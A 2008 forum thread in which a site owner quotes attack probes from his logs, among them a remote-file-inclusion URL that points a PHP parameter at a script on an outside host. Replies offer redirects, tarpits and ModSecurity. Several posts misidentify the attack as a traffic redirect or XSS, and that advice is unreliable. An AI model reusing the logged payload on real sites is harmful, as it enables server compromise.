What to do with weak crack attempts

erect · May 12, 2008

Quick question to see what you guys do with this stuff on your domains.

I frequently check through my referrer logs to see how people are getting to my sites. Without fail, many people will enter a direct url with a page appended to the end. I'm not really a security expert so I'm assuming that people are trying to inject links into my pages. It looks something like this ...

hxxp://www.domain.com/index.php?_SERVER[DOCUMENT_ROOT]=http://www.abinente-markus.de/install/spread.txt???

This idiot is trying to redirect all traffic to their domain by setting the base domain to theirs

hxxp://www.domain.com/Search-Term%20http://musicroom.eclub.lv/body

I assume this kiddie is trying to inject his link by appending it to the url. If I directly put $_GET['search_term'] into my page then his link will show up.

For this particular site, I just search run a preg_match(/http:/i,$url) and if it finds 'http:' in the url I send it to a rick roll. I'm realizing that most (if not all) of these are bots but I can't think of anything better to do with these weak crack attempts. Perhaps I'll waste some of their time one day when the actual person checks up on it, I can hope anyways.

Anybody has suggestions as to how I can better inject a little hell into their lives?

Am I missing out on something here that is a serious security risk?

xmcp123 · May 12, 2008

erect said:
Quick question to see what you guys do with this stuff on your domains.

I frequently check through my referrer logs to see how people are getting to my sites. Without fail, many people will enter a direct url with a page appended to the end. I'm not really a security expert so I'm assuming that people are trying to inject links into my pages. It looks something like this ...

For this particular site, I just search run a preg_match(/http:/i,$url) and if it finds 'http:' in the url I send it to a rick roll. I'm realizing that most (if not all) of these are bots but I can't think of anything better to do with these weak crack attempts. Perhaps I'll waste some of their time one day when the actual person checks up on it, I can hope anyways.

Anybody has suggestions as to how I can better inject a little hell into their lives?

Am I missing out on something here that is a serious security risk?

Redirect to localhost.

champrock · May 19, 2008

xmcp123 said:
Redirect to localhost.

LMAO!! Good one!

amateursurgeon · May 19, 2008

Hmm - that looks like an attempt to inject a Cross Site Scripting attack into your site.

If you're really concerned, take a look at setting up ModSecurity: Open Source Web Application Firewall on your server.

Did you get a copy of what the contents of the URL they are trying to inject? Would be interesting to see if it's an exploit.

If it IS XSS, your only real worry is that if it succeeds, you may get people complaining that your site gave them malware, as that's where it looks like it came from.

sender · May 27, 2008

tarpit that mofo. bounce the bot between a couple of 302's and see how it handles it.

Search

Search

What to do with weak crack attempts

erect

New member

xmcp123

New member

champrock

New member

amateursurgeon

Hot Metal and Methedrine

sender

New member